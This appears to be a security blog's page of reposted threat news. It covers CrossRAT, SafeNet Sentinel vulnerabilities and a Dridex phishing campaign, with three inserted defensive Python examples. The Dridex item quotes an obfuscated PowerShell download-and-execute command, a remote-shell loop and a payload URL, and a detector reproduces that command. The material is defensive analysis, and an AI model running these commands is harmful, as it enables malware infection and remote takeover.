juancrui
Seguridad Informática
314 posts
Website on Information Security, Cybercrime, Malware, Forensics and much more
juancrui · 6 years ago
ShadowHammer: Malicious updates for ASUS laptops
juancrui · 6 years ago
Operation ShadowHammer
juancrui · 7 years ago
ESET: Ransomware, an enterprise perspective (paper, PDF): https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_Ransomware_Enterprise.pdf
juancrui · 7 years ago
Beware of malware: it now survives even operating system reinstalls
juancrui · 7 years ago
Creating a digital forensic laboratory: Tips and Tricks | Digital Forensics | Computer Forensics | Blog
See on Scoop.it - Forensics
juancrui · 7 years ago
Forensic disk acquisition over the network
See on Scoop.it - Forensics
On some occasions you need to acquire an image of a computer using a boot disk and network connectivity. Usually this is done by booting the machine under analysis from a Linux boot disk, with a second computer acting as the imaging collection platform, connected via a network hub or a crossover cable. The reasons this…
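The workflow above (evidence machine streams the disk, collection host writes the image) as an added example; this is not code from the original post. Both ends hash the bytes as they pass so the image can be shown to match what was read. The "device" is a constructed in-memory byte string so the example runs offline; on a real Linux boot disk the source would be the block device opened read-only, and the listener would use a fixed port rather than an ephemeral one.

```python
"""Network disk acquisition with end-to-end hashing (added example, not from the post)."""
import hashlib
import io
import socket
import threading

CHUNK = 64 * 1024  # read/transfer unit


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def send_image(src, host, port):
    """Evidence side: read src sequentially, stream it, return SHA-256 of the bytes sent."""
    h = hashlib.sha256()
    with socket.create_connection((host, port)) as s:
        while True:
            buf = src.read(CHUNK)
            if not buf:
                break
            h.update(buf)
            s.sendall(buf)
        s.shutdown(socket.SHUT_WR)  # EOF tells the collector the image is complete
    return h.hexdigest()


def receive_image(listener, dst):
    """Collection side: accept one connection, write everything to dst, return SHA-256 of the bytes written."""
    h = hashlib.sha256()
    conn, _ = listener.accept()
    with conn:
        while True:
            buf = conn.recv(CHUNK)
            if not buf:
                break
            h.update(buf)
            dst.write(buf)
    return h.hexdigest()


def acquire_over_network(device_bytes):
    """Run both ends on localhost. Returns (hash_sent, hash_received, image_bytes)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # ephemeral port for the self-contained run
    listener.listen(1)
    port = listener.getsockname()[1]
    dst = io.BytesIO()
    result = {}

    def collector():
        result["received"] = receive_image(listener, dst)

    t = threading.Thread(target=collector)
    t.start()
    sent = send_image(io.BytesIO(device_bytes), "127.0.0.1", port)
    t.join()
    listener.close()
    return sent, result["received"], dst.getvalue()


if __name__ == "__main__":
    # Constructed sample "device": 1 MiB of deterministic bytes.
    sample = bytes(range(256)) * 4096
    sent, received, image = acquire_over_network(sample)
    print("hash on evidence side:  ", sent)
    print("hash on collection side:", received)
    print("verified:", sent == received == sha256_hex(image))
```

The three hashes (sent, received, and a re-hash of the written image file) are what make the acquisition defensible; record them in the acquisition log. On a real boot disk the sender is usually dd or dc3dd piped into nc, with the same hashing done on each side.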
juancrui · 8 years ago
Malware Delivered via Windows Installer Files
See on Scoop.it - Security
SANS Internet Storm Center - A global cooperative cyber threat / internet security monitor and alert system, featuring daily handler diaries that summarize and analyze new threats to networks and internet security events.
juancrui · 8 years ago
CrossRAT a Trojan built with Java that infects Windows, macOS, Linux and Solaris
See on Scoop.it - Security
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/02/16/crossrat-trojan-built-java-infects-windows-macos-linux-solaris/ TAGS: Linux, macOS, Solaris, Windows

Last week, companies specializing in cyber security reported a new advanced persistent threat (APT) attributed to Dark Caracal, a group dedicated to espionage. Active since 2012, it has operated in 21 countries and has focused on mobile platforms, perhaps because of the large number of unsupported Android devices still in use. Recently the group developed a cross-platform remote access trojan (RAT) called CrossRAT, described as undetectable and able to infect Windows, macOS, Linux and Solaris.

According to an information security expert, the malicious actions it can carry out include remotely manipulating files on the system, taking screenshots, launching arbitrary executables and maintaining persistent access to the infected device. Researchers say that Dark Caracal does not rely on any zero-day vulnerability but uses basic social engineering through Facebook groups and WhatsApp messages.

CrossRAT is built in Java, so it is easy to decompile and reverse engineer. It ships a file called hmar6.jar that checks which operating system it is running on so that installation completes correctly for that platform. It then gathers information about the infected system, including the version, the architecture and the kernel build. On Linux systems that use systemd, it inspects the init files to determine the distribution; most popular distributions, including Ubuntu, Fedora, openSUSE, RHEL 7, Arch Linux, Mageia and Manjaro, use systemd.
CrossRAT implements OS-specific persistence mechanisms so that it is re-executed after a reboot, and it registers the infected computer with Dark Caracal's command and control server, allowing the attackers to send commands and extract data; this shows the malware was created for surveillance. It connects to the flexberry.com domain on port 2223. Information security professionals found it surprising that there is no predefined command to activate the keylogger: the feature exists but cannot be triggered from the command and control server, which suggests the malware is still at an early stage of development.
juancrui · 8 years ago
How to use “The Sleuth Kit” and “Autopsy” | Part 2 by Animesh Shaw
See on Scoop.it - Forensics
Quick overview. In this section we will learn about the following topics: creating a sample case for 4n6 study, and learning how to use FTK Imager.
juancrui · 8 years ago
CyberEdge Cyberthreat Defense Report Infographic
See on Scoop.it - Security
CyberEdge's comprehensive study and infographic of 1,100 security professionals' perceptions of the industry - fourth annual survey
juancrui · 8 years ago
Cheat sheets & Infographics
See on Scoop.it - Forensics
juancrui · 8 years ago
A silver bullet for the attacker
See on Scoop.it - Security
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/25/silver-bullet-attacker/ TAGS: HTTP protocol, silver bullet
A study into the security of hardware license tokens.

In recent years, vulnerabilities in industrial automation systems have become an increasingly important problem. Industrial control systems developed in parallel with IT systems, relatively independently and often without regard for modern secure coding practices, and this is probably the main source of ICS security problems. As a result, numerous custom solutions have appeared, including proprietary network protocols and algorithms for authentication and encryption, and these are the main source of the threats discovered by ICS security researchers. At the same time, industrial automation systems inherit some of their problems from common technologies (examples include CodeSys Runtime and Microsoft Windows vulnerabilities).
Companies attach different priority levels to such problems and the risks associated with them. Everyone agrees that vulnerability information should not be disclosed until a patch is released. However, many companies believe that it should not be published even once a patch is available. For software developers it is always a blow to their reputation, and companies that use vulnerable systems are not always able to install a patch, or doing so may involve significant costs (interrupted operation of the systems being updated, the labour of installing updates, and so on).

We assess risks from our experience as a developer and supplier of security products. We are convinced that it is essential to inform users of vulnerable software about a new threat and the need to update as soon as possible. This does not guarantee that all users of vulnerable systems will update promptly and the threat will go away. But in our experience, if it is not done, very few users update their systems in a timely manner even when patches are available. We confront hundreds of thousands of new threats every day and see that threat actors are constantly looking for new attack opportunities; by keeping silent about problems we give them a chance. This is why we decided to share one of our discoveries: according to our research, connecting a software license management token to a computer may open a hidden remote access channel for an attacker.

Why we decided to analyze SafeNet Sentinel

While performing penetration tests, Kaspersky Lab ICS CERT experts repeatedly encountered the same service on the computers of customers who used software and hardware solutions from different industrial vendors. The experts did not attach much importance to it until it was found to be vulnerable.
The service was hasplms.exe, part of the SafeNet Sentinel hardware-based solution by Gemalto. The solution provides license control for customer software and is widely used in ICS and IT systems. Its software part consists of a driver, a web application and a set of other components; the hardware part is a USB token, which must be connected to the PC or server on which a software license is required. Some of the USB token models are listed in the table below.

License control solutions of this type work as follows: a software product requires a license to operate properly; when the USB token is plugged into the computer, the software "sees" the license and becomes fully functional. The token must be plugged in every time the software is started and remain connected while it is in use. The software part of the Gemalto solution is installed once and remains functional regardless of the life cycle of the software that requires the token.

This Gemalto solution is used in products by other software vendors, including ABB, General Electric, HP, Cadac Group, Zemax and many other organizations, the number of which, according to some estimates, reaches 40 thousand. According to independent research conducted by Frost and Sullivan in 2011, SafeNet Sentinel, now owned by Gemalto, has a 40% market share for license control solutions in North America and over 60% in Europe. The number of end users of Gemalto solutions is not known; if each company has 100 clients, the number of users is in the millions. Unfortunately, few people realize that connecting a token to a computer for license control may not be a safe thing to do.

Vulnerabilities and attack vectors

From the researchers' viewpoint, hasplms.exe exhibited rather curious behavior: it could be reached and communicated with remotely on open port 1947.
The protocol type was selected by the network packet header: either HTTP or a proprietary binary protocol was used. The service also had an API of its own, based on HTTP. Analysis was made harder by the fact that the binary used a VMProtect-type protector and generated its bytecode from the original Gemalto code, so fuzzing was chosen as the main tool for analyzing the vulnerable service's behavior.

We first looked at the localization function: the user could download language packs consisting of two files, one of which was localize.xml. The second file, in HTML format, had parameters, one of which turned out to be vulnerable to buffer overflow. It would have been a simple vulnerability if not for one curious detail: although a protector was used, the developers did not use any of the classical mitigations against such binary vulnerabilities (Stack Canary, Stack Cookie, ASLR, etc.). As a result, a simple buffer overflow could allow an attacker to execute arbitrary code on the remote system. Such development flaws are rare in modern solutions: serious commercial products are normally built under a security development lifecycle (SDL), so that security is designed into the application rather than added as an option afterwards. This attack vector needs no local privilege escalation (LPE): the vulnerable process runs with SYSTEM privileges, so malicious code runs with the highest privileges.
Sample script loading a language pack file
Result of Buffer Overflow exploitation, leading to RCE
The vulnerability was assigned CVE-2017-11496. It was just one of the vulnerabilities we found, and the overall result of our research was disquieting. In late 2016 and early 2017, 11 vulnerabilities were identified: two allowing remote code execution and nine denial-of-service vulnerabilities. By June 2017, Kaspersky Lab ICS CERT had identified three more: an XML bomb and two denial-of-service flaws, one of which could potentially lead to remote execution of arbitrary code. In total, 14 vulnerabilities were identified, all quite dangerous (for example, each of the remote code execution vulnerabilities is exploited with SYSTEM privileges, the highest privilege level in Windows). All attack vectors affecting the vulnerable service were multi-stage. We promptly sent all information on the vulnerabilities identified to Gemalto. They were assigned the following CVE numbers:

CVE-2017-11496 – Remote Code Execution
CVE-2017-11497 – Remote Code Execution
CVE-2017-11498 – Denial of Service
CVE-2017-12818 – Denial of Service
CVE-2017-12819 – NTLM hash capturing
CVE-2017-12820 – Denial of Service
CVE-2017-12821 – Remote Code Execution
CVE-2017-12822 – Remote manipulations with configuration files

In addition to the vulnerability descriptions, we sent Gemalto a description of peculiar functionality.

Peculiar functionality

Kaspersky Lab ICS CERT experts found that hasplms.exe has some rather unusual functionality. When a Gemalto USB token is first connected to a computer (even if the active session is locked), a driver and a service that accepts network connections on port 1947 are installed, provided Internet access is available. If the driver is downloaded manually from the Gemalto website and installed, the same driver and service are installed and port 1947 is added to the Windows firewall exceptions.
If the Gemalto software is installed as part of a third-party installer, port 1947 is also added to the Windows firewall exceptions. There is an API function that enables or disables the administrative panel in the web interface, making it possible to modify the settings of the software part of the SafeNet Sentinel solution; by default the panel is available on the localhost address, 127.0.0.1. The API can also be used to change the internal proxy settings used for updating language packs. After changing the proxy server, the service's internal logic can be used to obtain the NTLM hash of the account under which hasplms.exe runs (i.e., SYSTEM). This appears to be an undocumented feature and can be used for stealthy remote access: remote attackers can use these capabilities to gain access to the administrative panel, carry out attacks with SYSTEM privileges and conceal their presence afterwards. As mentioned above, Gemalto representatives were informed of this attack vector.

Non-transparent security

Solutions, technologies or individual software modules used by many third-party vendors often do not undergo proper security testing, which potentially opens new attack vectors. At the same time, closing vulnerabilities in such products, which are often used in banking and industrial control systems among others, is not always a smooth process: for some reason, vendors of such systems are in no hurry to notify their users of problems identified in their products. In early 2017 we sent information about the 11 vulnerabilities we had identified to Gemalto. Only in late June, in response to our repeated requests, did the vendor inform us that a patch had been released and that information about the vulnerabilities closed, as well as a new version of the driver, could be found on the company's internal user portal.
On June 26 we informed Gemalto of the suspicious functionality and of three more vulnerabilities. This time things moved faster: on July 21 the vendor released a private notice about a new driver version, without any mention of the vulnerabilities closed. According to Gemalto, the company notified all of its customers of the need to update the driver via their account dashboards. This was apparently not sufficient: after we published information about the vulnerabilities, we were contacted by several developers of software that uses hasplms, and it became clear from our communication that they were not aware of the problem and were continuing to ship versions of the product with multiple vulnerabilities.

Update software to the current version (7.6) ASAP

We urge users and companies that use Gemalto's SafeNet Sentinel to install the latest (secure) version of the driver as soon as possible, or to contact Gemalto for instructions on updating it. If the driver was installed via Microsoft Windows Update, we recommend checking that hasplms.exe is the latest version; if an obsolete version is in use, install the latest (secure) driver from the vendor's website or contact Gemalto for instructions. We also recommend closing port 1947, at least on the external firewall (on the network perimeter), as long as this does not interfere with business processes. This will help to reduce the risk of the vulnerabilities being exploited.

Some software vendors who use third-party solutions as part of their products may be very thorough about the security of their own code while leaving the security of third-party components to the vendors of those components.
We very much hope that most companies act responsibly both with respect to their own solutions and with respect to third-party solutions used in their products. Source: https://securelist.com/a-silver-bullet-for-the-attacker/83661/
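One way to act on the advice above (find out where port 1947 is reachable and whether the version is current), as an added example; this is not code from the Kaspersky Lab ICS CERT article or from Gemalto. The article states that hasplms.exe accepts connections on TCP 1947 and speaks HTTP there, and that 7.6 is the fixed driver version; everything else is an assumption of this script: the HTTP Server header is read only as a triage hint (the real service's header is not known here), the version check applies to whatever version string you feed it (banner or the file version of hasplms.exe), and the self-test stands up a local HTTP server with a constructed banner, not a real hasplms.exe response.

```python
"""Inventory hosts exposing the license manager port and triage the version (added example)."""
import http.server
import re
import socket
import threading

SENTINEL_PORT = 1947
MIN_SAFE_VERSION = (7, 6)  # per the article's "update to 7.6" advice
VERSION_RE = re.compile(r"\d+(?:\.\d+)+")


def parse_version(text):
    """'7.6' -> (7, 6). Plain dotted comparison: if the vendor's scheme treats
    7.50 as older than 7.6, normalise the string first (assumption: scheme unknown here)."""
    nums = []
    for part in text.strip().lstrip("vV").split("."):
        digits = "".join(ch for ch in part if ch.isdigit())
        if not digits:
            break
        nums.append(int(digits))
    return tuple(nums)


def is_outdated(version_text, minimum=MIN_SAFE_VERSION):
    """Unparseable strings compare as () and are treated as outdated (fail closed)."""
    return parse_version(version_text) < minimum


def probe(host, port=SENTINEL_PORT, timeout=2.0):
    """Return None if nothing listens on host:port, else the HTTP Server header ('' if absent)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"GET / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            data = b""
            while len(data) < 4096:
                chunk = s.recv(1024)
                if not chunk:
                    break
                data += chunk
    except OSError:
        return None
    head = data.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            return value.strip()
    return ""


def audit(hosts, port=SENTINEL_PORT, timeout=2.0):
    """Map each host to 'closed', 'exposed, version unknown', 'exposed, outdated (x)' or 'exposed, x'."""
    report = {}
    for host in hosts:
        banner = probe(host, port, timeout)
        if banner is None:
            report[host] = "closed"
            continue
        m = VERSION_RE.search(banner)
        if not m:
            report[host] = "exposed, version unknown"
        elif is_outdated(m.group(0)):
            report[host] = f"exposed, outdated ({m.group(0)})"
        else:
            report[host] = f"exposed, {m.group(0)}"
    return report


class _FakeBanner(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the self-test only; not a real license manager."""
    banner = "ConstructedLicenseManager/7.5"

    def version_string(self):
        return self.banner  # becomes the Server header

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")

    def log_message(self, *args):
        pass


def run_fake_server():
    srv = http.server.HTTPServer(("127.0.0.1", 0), _FakeBanner)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def free_port():
    """A port nothing listens on, for the 'closed' case of the self-test."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    srv = run_fake_server()
    print(audit(["127.0.0.1"], port=srv.server_address[1]))  # {'127.0.0.1': 'exposed, outdated (7.5)'}
    print(audit(["127.0.0.1"], port=free_port()))             # {'127.0.0.1': 'closed'}
    srv.shutdown()
```

Run audit() against your server ranges with the default port; every host reported as exposed is a candidate both for the driver update and for a perimeter firewall rule on 1947, as the article recommends.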
juancrui · 8 years ago
Installing SIFT Workstation under Windows Subsystem for Linux
See on Scoop.it - Forensics
SIFT In a recent post I alluded to the fact that I had successfully installed SIFT Workstation under Windows Subsystem for Linux (WSL).
juancrui · 8 years ago
NEW YEAR, NEW LOOK - DRIDEX VIA COMPROMISED FTP
See on Scoop.it - Security
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/19/new-year-new-look-dridex-via-compromised-ftp/ TAGS: Dridex, Dridex banking Trojan

Forcepoint Security Labs recently observed a peculiar email campaign distributing a variant of the Dridex banking trojan. The campaign used compromised FTP sites instead of the more usual HTTP links as download locations for the malicious documents, exposing the credentials of the compromised FTP sites in the process.

The malicious emails were sent just before 12:00 UTC on 17 January 2018 and the campaign remained active for approximately seven hours. The emails went primarily to .COM top-level domains (TLDs); the second, third and fourth most affected TLDs suggest that the major regional targets were France, the UK and Australia respectively. The sender domains were compromised accounts. The sender names rotated among the following, perhaps to make the emails look more convincing to unsuspecting recipients: admin@, billing@, help@, info@, mail@, no-reply@, sale@, support@ and ticket@. Below is a sample malicious email:

The campaign used two types of documents.
The first is a DOC that abuses DDE to execute the following shell command to download the malware:

c:\Windows\system32\cmd.exe /k Echo Microsoft Office Document YES && pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')

The link returns a Base64-encoded string that decodes to the following download code, a loop that reads commands from a network stream, runs them with iex and writes the output back:

while (1 -eq 1) try % 0 ; while(($i=$zm.Read($bt,0,$bt.Length)) -ne 0) $d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i); $st= ([text.encoding]::ASCII).GetBytes((iex $d 2>&1)); $zm.Write($st,0,$st.Length); $zm.Flush() catch Start-Sleep -s 10; if($zcl.Connected) $zcl.Close(); }

The second type is an XLS file with a macro that downloads Dridex from the following location:

hxxp://theairlab[.]co.za/KJHdey3

It is then executed using the following command:

cmd.exe /c START "" C:\Users\<redacted>\AppData\Local\Temp\vanilaice8.exe

ANALYSIS

The compromised servers do not appear to be running the same FTP software, so it seems likely that the credentials were compromised in some other way. The perpetrators do not appear to be worried about exposing the credentials of the FTP sites they abuse, potentially exposing the already-compromised sites to further abuse by other groups. This may suggest that the attackers have an abundant supply of compromised accounts and view these assets as disposable. Equally, if a compromised site is used by multiple actors, attribution becomes harder for security professionals and law enforcement.

Multiple attributes of the campaign suggest that it may be coming from the Necurs botnet: the domains used for distribution were already in our records as compromised domains used in previous Necurs campaigns; Necurs is historically known to spread Dridex; the document downloaders are similar to those used by Necurs in the past; and the download location of the XLS file follows the traditional Necurs format.
However, the volume of this campaign is very low compared to typical Necurs campaigns. Necurs typically sends millions of emails per campaign, while this one was recorded sending just over 9.5K emails in total. Necurs has recently been recorded using malicious links (as opposed to malicious attachments) to distribute Dridex, but the switch to FTP-based download URLs is an unexpected change.

PROTECTION STATEMENT

Forcepoint customers are protected against this threat at the following stages of attack: Stage 2 (Lure): malicious emails associated with this attack are identified and blocked. Stage 5 (Dropper File): malicious files are prevented from being downloaded. Stage 6 (Call Home): attempts by Dridex to contact its C&C server are blocked.

CONCLUSION

Cybercriminals constantly update their attack methods to try to ensure maximum infection rates. In this case FTP sites were used, perhaps in an attempt to evade email gateways and network policies that may treat FTP servers as trusted locations. The presence of FTP credentials in the emails highlights the importance of regularly changing passwords: a compromised account may be abused multiple times by different actors as long as the credentials remain the same. Although attributes of the campaign suggest it is coming from Necurs, the size of the campaign is more or less 'average'; given Necurs' typical association with very large campaigns, the reason for this remains something of a mystery.

Source: https://blogs.forcepoint.com/security-labs/new-year-new-look-dridex-compromised-ftp
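A detector for the two lure types described above (a DDE field that launches cmd.exe/PowerShell, and a macro-bearing spreadsheet), as an added example; this is not code from the Forcepoint write-up. It inspects the Office Open XML zip container (.docx/.docm/.xlsm) for field instructions carrying DDE or DDEAUTO, strips the cmd.exe caret escapes the campaign used (pow^ers^hell.e^xe), and reports whether the field launches a script host. The legacy binary .doc/.xls formats used in this campaign need an OLE parser such as oletools' msodde/olevba, which this example does not cover. The sample documents are constructed in memory and contain only the parts the scanner reads.

```python
"""Flag DDE fields and VBA projects in OOXML documents (added example, not from the write-up)."""
import io
import re
import zipfile
from xml.sax.saxutils import escape, unescape

DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.I)
INSTR_RUN_RE = re.compile(r"<w:instrText\b[^>]*>(.*?)</w:instrText>", re.S)
INSTR_ATTR_RE = re.compile(r'w:instr="([^"]*)"')
SHELL_RE = re.compile(r"powershell|cmd\.exe|mshta|wscript|cscript|regsvr32|certutil", re.I)


def deobfuscate_cmd(s):
    """cmd.exe drops '^' escape characters before executing, so strip them to see the real verb."""
    return s.replace("^", "")


def scan_ooxml(data):
    """Return a list of findings for one OOXML file given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if any(n.lower().endswith("vbaproject.bin") for n in names):
            findings.append("vba-project")
        for n in names:
            if not n.lower().endswith(".xml"):
                continue
            xml = zf.read(n).decode("utf-8", "replace")
            # Field code may be split across several w:instrText runs; join them before matching.
            instr = "".join(INSTR_RUN_RE.findall(xml)) + " " + " ".join(INSTR_ATTR_RE.findall(xml))
            instr = unescape(instr)
            if DDE_RE.search(instr):
                findings.append(f"dde-field:{n}")
                if SHELL_RE.search(deobfuscate_cmd(instr)):
                    findings.append("dde-launches-shell")
    return findings


def build_sample_docx(instr, with_vba=False):
    """Constructed minimal container holding just the parts the scanner inspects (not a valid Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(
            "word/document.xml",
            '<w:document><w:body><w:p>'
            '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            f'<w:r><w:instrText xml:space="preserve">{escape(instr)}</w:instrText></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
            '</w:p></w:body></w:document>',
        )
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    # Field code modelled on the campaign's DDE command (URL defanged as in the write-up).
    dde = ('DDEAUTO c:\\Windows\\system32\\cmd.exe "/k Echo Microsoft Office Document YES && '
           "pow^ers^hell.e^xe -W hidden -Exec Bypass -nologo -noprofile -c "
           "IEX(New-Object Net.WebClient).DownloadString('http://185.176.221[.]146/download/s/GTz')\"")
    print(scan_ooxml(build_sample_docx(dde)))           # ['dde-field:word/document.xml', 'dde-launches-shell']
    print(scan_ooxml(build_sample_docx("PAGE")))        # []
    print(scan_ooxml(build_sample_docx("PAGE", True)))  # ['vba-project']
```

Any "dde-launches-shell" hit is worth quarantining outright; a bare "vba-project" in a spreadsheet from an unknown sender is a lower-confidence signal that should be paired with macro content analysis.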
juancrui · 8 years ago
OnePlus confirms hack exposed credit cards of phone buyers
See on Scoop.it - Security
SOURCE: Information Security Newspaper http://www.securitynewspaper.com/2018/01/20/oneplus-confirms-hack-exposed-credit-cards-phone-buyers/ TAGS: credit cards, hack exposed, OnePlus
The company put a hold on payments through its site after fraud reports emerged.
OnePlus has confirmed that its systems were breached, following reports of credit card fraud from customers who bought a phone from the company. The phone maker sent an email to customers on Friday saying that customers' credit card numbers, expiry dates and security codes "may have been compromised." The email, posted by Peter Smallbone on Twitter, said: "As soon as we were made aware of the attack, we launched an urgent investigation. We suspended credit card payments and have been working with a cybersecurity firm to reinforce our systems." Several customers also posted the same email on the company's forums on Friday. The company is "looking" to provide credit card monitoring for affected customers. A malicious script was inserted into the company's payment pages, capturing card data and sending it directly from the user's browser. The script, now removed, is said to have "operated intermittently." The company said customers who entered their credit card details on its site between mid-November and January 11 may be affected, which may include "up to 40,000" customers. Anyone who paid with PayPal isn't affected, nor are those who paid with a previously saved credit card on file. A OnePlus spokesperson did not comment beyond the company's statement. Reports of credit card fraud started appearing over the weekend. On Thursday, the company said it was looking into a "serious issue" and that "as a precaution, we are temporarily disabling credit card payments" on its site. Source: http://www.zdnet.com/article/oneplus-confirms-hack-exposed-credit-cards-of-phone-buyers/
juancrui · 8 years ago
Hackers may have stolen the health data of more than half of Norway's population
See on Scoop.it - Security
SOURCE: Noticias de seguridad informática http://noticiasseguridad.com/hacking-incidentes/unos-hackers-han-podido-robar-los-datos-sanitarios-de-mas-de-la-mitad-de-la-poblacion-de-noruega/ TAGS: hackers, Norway

It appears that a group of hackers, or a lone hacker, has stolen the health data of more than half of Norway's population, according to various local media. The attack reportedly took place on 8 January, when the regional health authority Health South-East (in the south-east of the country) announced a security breach on its website. HelseCERT, the computer emergency response team for the Norwegian health sector, identified suspicious traffic coming from the Health South-East network. An investigation by the IT staff of Sykehuspartner HF, a company belonging to Health South-East, showed evidence of a major data breach. In a joint statement, Health South-East and Sykehuspartner HF explained that "this is a serious situation and measures have been taken to limit the damage caused by this incident". Health South-East has no doubt that "a professional and advanced player" is behind the attack, and law enforcement and the national computer emergency response team have been notified so that they can act. The Minister of Health said that the measures taken include removing the threat. Health South-East manages healthcare in nine of Norway's eighteen counties, including the capital and most populous city, Oslo. This significantly increases the number of people affected, which could reach 2.9 million of Norway's 5.2 million inhabitants. The situation is causing considerable alarm in the country.
On the one hand, some security researchers in Norway itself criticize Health South-East for the poor security of its systems, while the health authority is calling for calm to stop tension rising further. Nevertheless, many suspect that a great deal of information about this matter is being withheld. Source: https://www.muyseguridad.net/2018/01/19/hackers-robar-datos-sanitarios-noruega/